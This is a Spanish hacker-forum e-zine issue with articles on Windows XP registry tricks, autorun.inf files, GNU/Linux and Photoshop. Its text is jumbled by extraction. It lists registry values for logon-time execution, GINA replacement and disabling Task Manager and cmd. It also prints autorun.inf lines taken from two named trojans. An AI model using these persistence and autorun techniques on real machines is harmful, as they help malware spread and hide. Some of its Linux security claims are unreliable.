Este documento explica, lo que es el registro y la forma de manipularlo y por ello hacer lo se nos antoje con el SO Windows XP, (En prximos nmeros del zine, explicaremos como hacerlo con otras versiones del Windows) Primero que todo debemos saber que el registro de Windows es una gran base de datos que contiene datos sobre los programas instalados en el PC y sus respectivas opciones de configuracin. All se almacena la informacin de cada uno de los dispositivos instalados en el computador. Toda esta informacin se encuentra estructurada de una manera jerrquica, similar a la estructura de directorios y archivos. Para modificarlo existe varias maneras de hacerlo, la mas sencilla y comn es desde el editor de registro (regedit). El registro es uno de los puntos crticos del sistema operativo windows, por ello es necesario conocer su funcionamiento y la forma en que lo podemos manipular o modificar. Tambin cabe decir que debemos tener cuidado don lo que hagamos con el ya que podramos daar totalmente el sistema operativo, por eso antes de manipular cualquier cosa del registro, yo recomiendo hacer un backup,, como lo hacemos?, sencillovamos al men inicio ejecutar regedit Exportar y ubicamos el archivo resultante en un lugar de fcil acceso. Podemos guardar una parte (rama) o todo el registro, para ello nos posicionamos sobre la rama que deseamos guardar, es el caso de la imagen: MI PC , lo guardara todo. Los archivos del registro llevan la extensin .reg y si hacemos click sobre ellos copian al registro toda la informacin contenida en su interior.

By Alesteir
igual forma cada valor tiene un nombre; y guarda algun tipo de valor informacin

Las Claves
1. HKEY_CLASES_ROOT: Contiene la informacin sobre las programas y la forma en que se encuentran asociados con las extensiones del S.O. 2. HKEY_CURRENT_USER: Contiene la informacin de cada programa como pueden ser:, traducciones, sonidos, tambin contiene toda la informacin sobre el panel de control, las conexiones a Internet y sus respectivos nombres, los ltimos programas y archivos utilizados, direcciones de correo electrnico y un largo etc. Tambin estn almacenados los nombres de los directorios y archivos necesarios para ejecutar cualquier aplicacin. 3. HKEY_LOCAL_MACHINE: En esta clave encontramos Informacin sobre los controladores necesarios y los utilizados, el tipo de hardware usado o reconocido, tambin contiene la informacin sobre los puertos. 4. HKEY_USER: Aqu esta dodo lo relativo a los datos sobre cada usuario. Cada vez que un usuario diferente utiliza el PC, sus configuraciones se guardan en esta clave. 5 .HKEY_CURRENT_CONFIG: Aqu encontramos los datos de los Plug-ins utilizados por los programas, contiene todos lo nombres y especificaciones de cada uno de los perifricos.

Toda la informacin del registro esta estructurada de manera jerrquica, de la misma forma en que estn estructura dos los directorios y archivos del sistema operativo. Clave es el nombre que se la da las carpetas, a su vez cada clave tiene muchas subclaves y as sucesivamente, hasta llegar al valor en especfico, de

En la prxima entrega vernos mas sobre el registro y la forma en que lo manejamos, por el momento voy a dejar una recopilacin de los valores que nos pueden ayudar en cuanto a hack se refiere.

CUH e-zine vol #1 - 1 edicin

El Registro de Windows XP

Valores del registro hackeables


Esta es un recopilacin de valores que nos pueden ayudar enormemente, es obvio que es solo para los mas avanzados en este tema, cuidado!, ya os he advertido (Mucho ojo al manipular el registro)

Sustituir la pantalla de bienvenida

HKEY_LOCAL_MACHINE\-Software\Microsoft\Windows NT\CurrentVersion\Winlogon valor alfanumrico GinaDLL El contenido ser el nombre de la librera que se usa por defecto y es: msgina.dll
Especificar archivos ejecutados por Winlogon

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon valor alfanumrico ex System, cuyo contenido tendr la ruta de los archivos que se ejecutarn al inicio de sesin con privilegios de sistema. Excluir un programa de Inicio HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation valor alfanumrico AddRemoveApps, contiene los nombres de los ejecutables, de los programas que no deseamos en el men de Inicio, seguido de un punto y coma ; Cerramos sesin! Pulsar Ctrl+Alt+Supr para iniciar la sesin HKEY_LOCAL_MACHINE\-SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon valor DWORD DisableCAD 0 activa , 1 desactiva Ocultar el reloj de la Barra de tareas HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer valor DWORD HideClock, 0 muestra el reloj o 1 lo oculta. Esconder cuentas de usuario de la pantalla de bienvenida HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList valor DWORD cuyo contenido ser el nombre de usuario y su contenido 0, reiniciamos! Cuenta de administrador en la pantalla de bienvenida HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList valor DWORD, su nombre ser administrador, el contenido ser 1 activa 0 desactivareiniciamos! Incluir Comandos al inicio del Interprete de Comandos Shell D.O.S. HKEY_CURRENT_USER \software\microsoft\Command Processor valor DWORD Autorun su contenido sera la ruta y el nombre del programa, o el comando DOS que se ejecutara al cargar el cmd.exe ( interprete de comandos<->Shell) se pueden introducir varios valores, solo es cuestin de separarlos por "&&" (Sin Comillas) prompt $d $t $p Listo! $_ && SYSTEMINFO >C:\INFO.TXT". Deshabilitar el interprete de comandos del D.O.S. 0 H HKEY_CURRENT_USER \software\policies\microsoft\windows\system valor Alfanumerico DisableCMD deshabilita 1 habilita la shell Desactiva la opcion de agregar o quitar programas del Panel de control valor Alfanumerico HKEY_CURRENT_USER \software\microsoft\windows\CurrentVersion\Policies\Uninstall NoAddRemovePrograms 0 desactiva 1 activa Deshabilitar el Administrador de tareas HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\policies\system valor Alfanumerico disabletaskmgr 0 deshabilita 1 habilita el administrator de tareas. Habilitar opcin de Borrar la lista de documentos recientes HKEY_CURRENT_USER \software\\microsoft\windows\CurrentVersion\policies\explorer valor Alfanumerico ClearRecentDocsOnExit 00,00,00,00 deshabilita y 01,00,00,00 habilita

CUH e-zine vol #1 - 1 edicin


Varios claves para optimizar el Windows !!!

El Registro de Windows XP

En esta parte voy a poner una serie de claves que optimizan eficientemente nuestro sistema, las podemos guardar como un archivo bat y ejecutarlas todas de una o simplemente mofificar la clave que deseemos!

OPTsystem.bat By Me prubenlo y me dicen! ;) reg add "HKCU\Control Panel\Desktop\ /v WaitToKillAppTimeOut" /d 4000 /f reg add "HKLM\system\CurrentControlSet\control /v WaitToKillAppTimeOut" /d /4000 /f reg add "HKLM\system\CurrentControlSet\control /v WaitToKillServiceTimeout /d /4000 /f reg add "HKLM\system\CurrentControlSet\control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /d 5 /f reg add "HKLM\software\microsoft\windows\CurrentVersion\explorer /v AlwaysUnloadDll" /d 1 /f
Despus de correr el bat vamos a la carperta prefetch y borremos todo los archivos all ubicados y reiniciamos Ootro truquito para aligerar el cierre y apertura de Windows es: ubicados dentro el editor del y posicionados sobre la clave principal MI PC y en el men edicin (o CTRL+B) escribimos la palabra kill, esto nos mostrara claves tales como waitotkill o algo por el estilo, cambiamos el contenido por defecto del valor que es 20000 por 4000 oprimimos f3 y hacemos lo mismo con todas las claves que empiecen waittokill y listo reiniciamos de nuevo para ver esos cambios (con coronometro en mano), asi como estas cosas hyay una cantidad de cosas que puerden ser utilizadas para una mejor untilizacion de los procesos, servicios y casi todo lo referente a este criticado pero genial sistema operativo.

Eso es todo en cuanto al registro por esta ocasin espero que lo estudien y aprendan toda la potencialidad que nos da manipular el registro de Windows, suerte a todos!

CUH e-zine vol #1 - 1 edicin

Funcin Autorun

Funcin Autorun

Editorial
asociada para el, adems de que puede aadir comandos adicionales al men emergente que aparece cuando hacemos doble clic a la unidad en particular. Cada vez que una unidad es detectada, el sistema operativo registra en busca de la existencia de el archivo Autorun.inf (El archivo debe estar ubicado siempre en el directorio raz). si lo encuentra ejecuta la secuencia de parmetros internos del autoejecutable; si no encuentra el archivo el S.O. se refiere al nuevo disco por su nombre por defecto y ejecuta las acciones asociadas y predefinidas con la funcin Autorun, tal como mostrar el men emergente, etc; a mi me recuerda al viejo y aun utilizado autoexec.bat (en cuanto a su caracterstica bsica y principal -ejecutarse automticamente-), aquellos que lo han usado saben de que les hablo.

Autorun.inf es un archivo asociado a una funcin interna


Autorun (Funciona elementalmente bajo Windows y corre sobre otros sistemas operativos) cuya principal finalidad es ejecutar una secuencia de comandos o parmetros que son ejecutados por el sistema operativo lnea por lnea, pudiendo: cambiar el icono de la unidad que lo contiene, correr un ejecutable, abrir un archivo con la aplicacin

Resumiendo un poco, la funcin Autorun define lo siguiente: El proceso o la aplicacin que se ejecutara automticamente cuando una nueva unidad es detectada. Opcionalmente se puede definir que corra sobre un determinado ambiente operativo. Un icono que ser visualizado en el Explorador de archivos o en Mi PC representara a la unidad en particular. Una Ventana emergente O Men de opciones desplegado cuando hacemos clic derecho sobre la unidad. La funcin de auto arranque funciona con cualquier unidad de disco: CD, DVD, dispositivos de almacenamiento va USB, Discos duros, y Unidades Zip, que contenga un archivo autorun.inf ubicado siempre en el directorio raz, cabe recalcar que por defecto esta funcin esta desactivada para unidades que no sea CD-ROM1.

Como lo creamos?
Es muy fcil, simplemente abrimos editor de texto plano como wordpad o el bloc de notas -->inicio->ejecutarnotepad.exe1y simplemente definimos los parmetros que comandos que se adapten a nuestras necesidades, lo guardamos en la unidad (USB, CD-RW, DVD-RW, Discos locales, etc) como Autorun.inf , si no sabemos usar los CDs regrabables, pues preparamos todo el paquete (Tal como un rootkit) en una carpeta a la mano y quemamos todo en un cd, teniendo muy en cuenta las rutas que usaras o simplemente grabando todo en el directorio raz. Yo uso mucho esta funcin , para crear Cds bien sea: totalmente autnomos, o que interacten con el usuario (Especial para Tutoriales o Programas)

CUH e-zine vol #1 - 1 edicin

Funcin Autorun

Parmetros o Comandos:

Parametro
Icon Label Etiqueta Open-Abrir Shellexecute Shell\verb Shell

Sintaxis
icon=[ruta\]nombreicono[,index]

Ejemplo
icon=ejecutable.exe,1 ; icon=1.ico label=CUH e-Zine

- label=NombreUnidad
open=[ruta\]ejecutable [param1 [param2] ...] shellexecute=[filepath\]filename[param1,[param2]...] shell\verb\command=NombreArchivo.exe

open=AutoArranque.exe shellexecute=Escanear.exe

shell\install\command=start instalar.exe
shell\uninstall = &Desinstalar
2

shell\verb=TextoMenu

Men Emergente

CUH e-zine vol #1 - 1 edicin

Funcin Autorun

Ejemplos de cmo hacer un autorun.inf CUH e-Zine Sample


[ Autorun] Label=CUH e-Zine icon=icono.ico open=autorun.exe action=Escanear dispositivo shellexecute=escanear.exe shell\comprobar=&Comprobar shell\ Comprobar\Command=comprobar.exe shell\install = &Instalar shell\install\command = start Instalar.exe shell\uninstall = &Desinstalar
3

Soundmix- Troyano Agent32


open= shell\open=(&O) shell\open\Command=RECYCLER\autorun.exe -OpenCurDir shell\open\Default=1 shell\explore=(&X) shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir

Troyano wscript
autorun [autorun] open= shell\open=(&O) shell\open\Command=WScript.exe .\autorun.vbs shell\open\Default=1 shell\explore=(&X) shell\explore\Command=WScript.exe .\autorun.vbs

shell\uninstall\command = start Desinstalar.exe shell\readme = &Leeme shell\readme\command =start notepad readme.txt shell\help = &Help shell\help\command = start ayuda.hlp

Mas informacion:
http://www.fermu.com/content/view/356/26/lang,es/ http://mundogeek.net/archivos/2006/04/10/dispositivos-usb-y-autoruninf/

CUH e-zine vol #1 - 1 edicin

GNU - LINUX

GNU/Linux

by LTSmash

Que es Linux?
Hola amigos. Hay una cosa en el mundo que muchos ignoran, y eso es la existencia de alternativas a Microsoft. Microsoft es una empresa dedicada a la informtica pero esto no implica que sea una empresa buena ni decente; sin embargo hay un producto suyo que esta presente en la mayora de los ordenadores del mundo, y se llama WINDOWS. Windows es el Sistema operativo (hay quienes dicen que no cumple los requisitos para ser catalogado como tal) mas usado en el mundo, y actualmente la mayora de las personas que manejan un ordenador por consecuencia trabajan con el mismo. Hay otros sistemas como MacOS de Apple, BSD el UNIX libre, Solaris de Sun Micro; incluso algunos otros sistemas ya muertos (OS/2 de IBM, DR-DOS de Digital Research, MSDOS de Microsoft y un largo etctera), incluso sistemas mucho menos conocidos que los anteriores como son ReactOS (la implementacin libre de Windows NT) y FreeDOS (una implementacin libre de DOS). Sin embargo, no son otros sistemas los que nos interesan, sino el nico y real, verdadero y tangible competidor de Windows: GNU/Linux. GNU/Linux es un sistema operativo de carcter libre, es decir, software que controla el funcionamiento apropiado del ordenador bajo una licencia permisiva donde se tiene acceso a varias libertades que con el software privativo seria imposible tener, como el cdigo fuente (source code en ingles) que en esencia seria la receta del software, y la libertad de distribuirlo y usarlo como prefiramos (dentro de la normatividad de la licencia). En el caso de Linux (el kernel/ncleo que es el nivel de software que controla la interaccin entre las aplicaciones y el hardware), se usa la licencia GPLv2 de la FSF (Free Software Fundation) que es la mxima casa del software libre fundada por Richard Stallman.

Bien, pero, Cules son las caractersticas?


Linux es software Libre, es un clnico del sistema UNIX (aunque en realidad estaba basado primariamente en MINIX) y fue escrito quiz como un ejercicio/pasatiempo o simplemente para hacer un SO por su creador: Linus Torvalds.

Pero exactamente qu significa eso de Libre y qu ventajas tiene?


Significa lo que mencione con anterioridad. El software libre tiene bsicamente cuatro puntos/libertades que lo definen como tal:

Ejecutar el programa con cualquier propsito (privado, educativo, pblico, comercial, militar, etc.)
Eso incluye la posibilidad de usarlo para aventar una bomba nuclear al pentgono y no es una broma.

Estudiar y modificar el programa (para lo cual es necesario poder acceder al cdigo fuente)
Asi que tenemos acceso a la receta del software y podemos usarla para mejorar nuestra habilidad programando (haciendo recetas de software).

Copiar el programa de manera que se pueda ayudar al vecino o a cualquiera


Asi es, si queremos se lo copiamos a todo el mundo y no ser esto ilegal, NO MAS WAREZ!

Mejorar el programa y publicar las mejoras


Colaboramos con la comunidad si as lo deseamos, de esta forma el software libre esta en continuo desarrollo y es por ello que es un modelo progresista.

CUH e-zine vol #1 - 1 edicin


Pero entonces por qu este genial sistema operativo no es ya lder mundial?

GNU - LINUX las dems: Slackware (la mas antigua con vida), Debian (padre de la mas usada que es Ubuntu), RedHat (la distro empresarial y comercial mas usada) y Gentoo (una metadistro, es decir, se reparte no de forma binaria/lenguaje-entendible-para-la-PC sino en modo de cdigo fuente listo para ser traducido a cdigo maquina). Hay miles de distros, y quiz sea muy difcil entrar a escoger una as que quiz quieras probar con algo como Ubuntu, la distro mas popular del momento y que es muy usada por ser simple y eficiente.

Linux es software, y no hay detrs de Linux una empresa MONOPOLICA (lase Microsoft) que haga FUD (FUD, del ingls, Fear, Uncertainty and Doubt, miedo, incertidumbre y duda es una expresin con la que se califica a una determinada estrategia comercial consistente en diseminar informacin negativa, vaga o sesgada con el objeto de perjudicar a un competidor, despus de 1991 el trmino se ha generalizado para referirse a cualquier clase de desinformacin usada como un arma competitiva.) y marketing por el, as que el poder de la publicidad puede mas que el de la comunidad hasta ahora. Sin embargo, hay una gran cantidad de empresas que viven del software libre (si, as es, ya sea dando soporte, desarrollando mas software como RedHat, Novell, Linspire, etc.; o incluso vendiendo Cds, pendrives y DVDs con SL) y ayudan mucho a probar que el software libre y Linux son rentables y con esto su difusin se incrementa.

Cmo se "estructura" Linux?


Linux, lo que se llama principalmente LINUX, es el kernel o ncleo, y de ah se gestiona la comunicacin entre software y hardware. Linux trabaja en cuestin algo diferente con lo que es el kernel, ya que el kernel puede incluir en si mismo los controladores o llamarlos externamente. Linux entonces tiene un excelente reconocimiento de software en las distros binarias ya que estn hechas para que tenga soporte con varios tipos de hardware. As mismo, si lo preferimos, podemos compilar un kernel a la medida que solo soporte el hardware que le indiquemos y que este optimizado para nuestra maquina, de modo que solo trabaje en ella y aumentando el rendimiento. Linux tiene lo que llamamos daemons. Un demonio, daemon dmon es un tipo especial de proceso informtico que se ejecuta en segundo plano en vez de ser controlado directamente por el usuario (es un proceso no interactivo).As pues, nuestro sistema trabaja con varios de estos y trabajara con mas segn se le indique que as sea, facilitando cosas como el ser multiusuario (podemos configurar nuestro equipo para acceder desde otro sin la intervencin de otro usuario, ni interrumpirle), podemos ordenarle que ejecute determinadas tareas cuando se le pida, etc.

Cmo se distribuye Linux?


Linux se distribuye adems particularmente en lo que llamamos distribuciones o distros, que no son sino compilaciones de software para tener un sistema operativo completo y funcionar, lo normal es que incluyan un sistema grafico (GUI, es lo que vemos en la pantalla como nuestro escritorio y los iconos), suites de ofimtica completas (como OpenOffice.org), aplicaciones multimedia (reproductores de video y audio), incluso juegos. Las distros se clasifican ya sea dentro de lo general y lo especifico/especializado, es decir, distros que son hechas para que cualquiera las use o distros que estn hechas para que, por ejemplo, se adapten a las necesidades de un msico (el caso de Musix). Hay cuatro distros actuales de donde surge la mayora de

Y que tal luce Linux?


Linux luce como t quieras que luzca. En trminos generales, en un sistema Linux es muy comn encontrar tres entornos de escritorio (Un entorno de escritorio, en ingls Desktop Environment es un conjunto de software para ofrecer al usuario de un ordenador un ambiente amigable y cmodo y es una solucin completa de interfaz grafica de usuario o GUI, ofrece iconos, barras de herramientas, programas e integracin entre aplicaciones con habilidades como, arrastrar y soltar.) principales, que son KDE, GNOME y XFCE.

CUH e-zine vol #1 - 1 edicin

GNU - LINUX

KDE

GNOME

Xfce

Y eso no es todo, no, por que podemos aadir widgets que son mini aplicaciones que se agregan a nuestro escritorio, como relojes y verificador de recursos del sistema en uso; incluso disponemos de Beryl y su nueva fusin con Compiz que es CompizFusion que da efectos superiores a los de cualquier otro S.O.:

Compiz-Fusion
actualizarse (con la excepcin del Kernel), Linux no necesita actualizar cada programa manualmente, Linux no necesita antivirus ni antispyware. Linux es tan potente, que se le puede dar cualquier uso, desde un escritorio hogareo, pasando por centro multimedia hasta servidor web; INCLUSO SE USA EN HOLLYWOOD PARA LA EDICION DE PELICULAS. Concluyendo... Linux es la solucin viable para liberarnos de un monopolio, de sus restricciones, de que se nos manipule. Debemos detener al monstruo y ser libres. Tenemos las herramientas, HAGAMOSLO!

Y la seguridad? Que tan seguro es GNU/Linux?

La gente con el paso del tiempo se ha acostumbrado a constantes fallos, a que un ordenador sea vulnerable a virus, que no sea estable, que haya que reiniciar para actualizarse y que esto no nos de ningn beneficio, que la PC se ralentice con el tiempo, incluso al instalar un programa, acostumbrados a usar un antivirus y un antispyware que desgraciadamente no les protege del todo pero que les cuesta dinero y recursos del sistema. Estn acostumbrados a la poca madurez del software. Linux no puede cumplir con las expectativas, lamentablemente, ya que es un sistema muy estable, flexible y bien probado, que progresa con el tiempo: Linux no se ralentiza con el tiempo, Linux no necesita reiniciar para

CUH e-zine vol #1 - 1 edicin

GNU - LINUX

Por LTSmash

GNU

Los sistemas GNU Linux son utilizados en muchos lugares, que van desde los escritorios hasta sistemas de misin critica en grandes empresasy/oinstanciasgubernamentales Linux te da la libertad no como gratuidad. Dicha libertad se refiere a que podemos correr, leer y escribir el software. Esto es, que cuando obtienes un programa, no solo obtienes el binario, sino que tambin puedes obtenerelcdigofuente,elcualpuedesleer, modificar e incluso distribuir sin ningn problemalegal.

programlamayoradedelaslneasdecdigo del kernell este genial y eficaz sistema operativollamadoLINUX. Primer mensaje que Linus Torvalds mando al grupodenoticiascomp.os.minix: From:torvalds@klaava.Helsinki.FI (Linus BenedictTorvalds) Newsgroup:comp.os.minix Subject:GCC1.40andaposixquestion MessageID: 1991Jul13, 100050.9886@klaava.Helsinki.FI Date:3Jul9110:00:50GMT

NotaEditorial

LINUX es un sistema operativo, compatible con Unix. Dos caractersticas muy peculiares lo diferencian del resto de los sistemas que podemos encontrar en el mercado, la primera, esqueeslibre,estosignificaquenotenemos que pagar ningn tipo de licencia a ninguna casadesarrolladoradesoftwareporelusodel mismo, la segunda, es que el sistema viene acompaado del cdigo fuente. El sistema lo forman el ncleo del sistema (kernel) mas un grannumerodeprogramas/librerasquehacen posiblesuutilizacin. o Linus Torvalds, la persona de la que empez todoesteproyecto,enelao1991,poraquel entonces, el era un estudiante de informtica de la Universidad de Helsinki, todo empez como una obsesin personal el fue el que

CUH e-zine vol #1 - 1 edicin

Photoshop Desde Cero

Usando el Photoshop e Imageready


En esta seccin DISEO GRAFICO por el momento vamos a trabajar con un programa(en realidad son dos)) en particular su nombre es Photoshop (maneja diseos estticos) e Imageready (manejo de animaciones) para los que manejis este programa , pues esta articulo puede parecer uno mas, pero lo que se intenta es introducir a principiantes pero tambin incluimos buenos trucos para usuarios intermedios y avanzados, como esta es la primera edicin del zine, empezaremos con los conceptos bsicos, componentes mas utilizados, atajos de teclado (shortcuts) , configuracin, y muchos trucos que nos ayudara a efectuar nuestros diseos de una forma mas eficiente y rpida (Incluso aumentando nuestra competitividad laboral, dado el hecho de que

By Alesteir
nos desempeamos en el diseo en general). Son pocos los calificativos que se le pueden dar a este genial programa, siendo usado en casi todos los rincones del mundo, a algunos tal vez se les dificulte al principio y tal vez terminen catalogndolo como un programa mas, pero no es as. Yo me puedo atrever a decir que photoshop es uno de los diez mejores programas informticos de todos los tiempos, y es que a medida que uno va aprendiendo a manejar y a combinar todas las herramientas es cuando se da cuenta del potencial y versatilidad que posee. Bueno, no mas bla,bla,bla, y a lo que vinimos! (Para Windows

solamente, esperamos implementarlo a Mac en prximas ediciones )

Instalar dos versiones


Pues para esta edicin vamos a r una de las versiones bsicas como es el Photohop 7.0, adems de ser el que mas me gusta usar -claro que se pueden tener instaladas dos versiones en un mismo sistema operativo (Ver imagenes 1 y 2), si algunos lo saben pues y si no pues, empecemos con un truquito, si tienes instalado ya algn programa y quieres tener otra versin pues simplemente la instalas y a la hora de elegir la carpeta destino para los archivos cambias el nombre y la ubicacin de la carpeta, pero recuerden que no podemos abrir las dos versiones del programa a la vez (aplicable a cualquier aplicacion). Fig. 1 Fig. 2

Los primeros pasos


Lo primero que debemos aprender: es saber abrir un nuevo archivo (Ctrl+N), veamos la figura de abajo, 1 nos indica que que abrimos un nuevo psd(Llamase al documento hecho en photoshop que preserva todas las caractersticas del diseo, como capas, estilos, etc), 2 el nombre del archivo, es mejor definirlo desde aqu, 3 este es el nombre predefinido para el documento, al seleccionar esta opcin, nos sale un men n con distintos tamaos , dependiendo de nuestras necesidades, pero lo realmente practico es lo siguiente, existe la opcin personalizar, una vez hayamos definido nuestras preferencias, podemos guardar todo asignndole un nombre y listo queda como un documento predeterminado, (supongamos que hacemos nuestra firma con las mismas caractersticas: 300x100 px, transparente, 72 ppi, etc.). 4 Indica el tipo de medida que vamos a manejar: Pixeles,

CUH e-zine vol #1 - 1 edicin


pulgadas, cm, mm, etc. 5 Esto se refiere a la cantidad de pixeles por pulgada PPI de resolucin del documento. 6 Aqu escogemos el modo de color del documento,

Photoshop Desde Cero pudiendo ser: Mapa de bits, Escala de grises, Color RGB, etc. 7 En esta parte definimos el color del fondo: transparente, blanco, o color de fondo.

Componentes de Photoshop

Nuestro espacio de trabajo, esta compuesto por ventanas, barras de herramientas, mens y el panel de herramientas, por defecto se ubican las ventanas a la derecha de la pantalla, el panel de herramientas al izquierdo y las barras en la parte superior (Horizontales); algunas veces vamos a necesitar tener nuestro espacio de trabajo libre de ventanas,(en photoshop podemos hacer las cosas de distintas maneras: 1. Accediendo a los mens 2. usando los atajos de teclado, 3. desde las ventanas, claro que no todas las opciones estn disponibles para ello, pero muchas si, por ejemplo para hacer un zoom, podemos usar Ctrl + + o ir a men vista y seleccionar aumentar, otra es desde la ventana navegador ver Fig. 4, -

all lo podemos hacer simplemente arrastrando la barra (1), o clicando sobre los triangulitos (2) )Una es, pulsando la tecla Tab (esconde todo), la otra es Shift + Tab (deja solo el panel), tambin hay un truquito, que os voy a ensear, en el men ventana, la primera opcin nos permite definir un espacio adecuado a nuestras necesidades o a un tamao en especifico, por ejemplo: para usar un diseo tipo banner necesitaremos poner las ventanas en la parte superior de forma que no nos estorbe al hacer un zoom ver Fig. 6, yo lo llamo 222 (Zoom al 222,55 %) ver Fig. 5, seleccionamos la opcin guardar espacio de

CUH e-zine vol #1 - 1 edicin


Fig. 5 Fig. 4

Photoshop Desde Cero

Fig.6 De igual forma photoshop permite personalizar muchas cosas, como son los mens, preferencias y incluso los atajos de teclado, para terminar este articulo, veremos algunos shortcuts mas usados, nos vemos en la prxima edicin, (recuerden que para el prximo numero empieza lo bueno )espero que les sirva y lo disfruten, que en el fondo es lo mas importante! ;) Suerte a todos!!! By alesteir

Atajos de teclado (Shortcuts)

CUH e-zine vol #1 - 1 edicin


Nuevo archivo --> Ctrl + N Abrir --> Ctrl + O Abrir como --> Ctrl + Alt + O Pegar --> Ctrl + V Cortar --> Ctrl + X Copiar --> Ctrl + C Combinar capas --> Ctrl + E Combinar capas visibles --> Ctrl+Shift+N Configurar pagina --> Ctrl + Shift + P Transformacin libre --> Ctrl+T Transformacin libre --> Ctrl+TCtrl+Alt+T Nueva capa --> Ctrl+Shift+N Nueva capa (sin dialogo) --> Alt+Ctrl+Shift+N Menus --> Ctrl+Alt+Shift+M Acercar --> Ctrl++ Alejar --> Ctrl+Niveles --> Ctrl + N Deshacer/rehacer --> Ctrl+Z Ultimo filtro --> Ctrl + F Ver extras --> Ctrl + H Modo de pantalla --> F Ver reglas --> Ctrl + R F1 Help Alt+A Menu Archivo Alt+E Menu Edicion Alt+U Ayuda Alt+V Menu Ventanas

Photoshop Desde Cero

Editar en imageready Shift+ Ctrl+M Herramienta Seleccin A Herramienta Notas N Herramienta Sector K Herramienta Mano H Herramienta degradado G Herramienta pluma P Herramienta Borrar E Herramienta Recortar C Herramienta Lazo L Herramienta Texto (Vertical / Horizontal) T Herramienta Forma U Herramienta Mover V Herramienta Varita mgica W Herramienta Marco M Herramienta Clonar S Herramienta pincel B Herramienta pincel de historia Y Herramienta pincel corrector J Colores por defecto (B/N) D Notacin sonora Shift+N Modo mascara rpida Q Alt+I Menu Imagen Alt+P Menu Capas Alt+S Menu Seleccion Alt+F Menu Filtro Alt+T Menu Ver

Desde aqu agradecemos a todos los colaboradores que han hecho esto posible , los organizadores de la e-zine somos, gallloo y alesteir que nos enorgullecemos de la e-zine que hemos creado entre todos. Aqu listo a todos los colaboradores y amigos que han participado:

.::Cr4m::. ManCuerTex (ViPeR) ElPerro froseck Don nadie furious dami XD JUCA Logan_doax elektro |_ocutus LTSmash Gracias a todos por parte de todo el foro
Si tienen alguna sugerencia o quiere contactar con nosotros, puede buscarnos en: http://foro.el-hacker.com O mandarnos un e-mail a cualquiera de estas dos direcciones de correo: sgs-ezine@el-hacker.org cbs-ezine@el-hacker.org

Mucha suerte a todos y hasta la prxima edicin de la CUH e-zine

También podría gustarte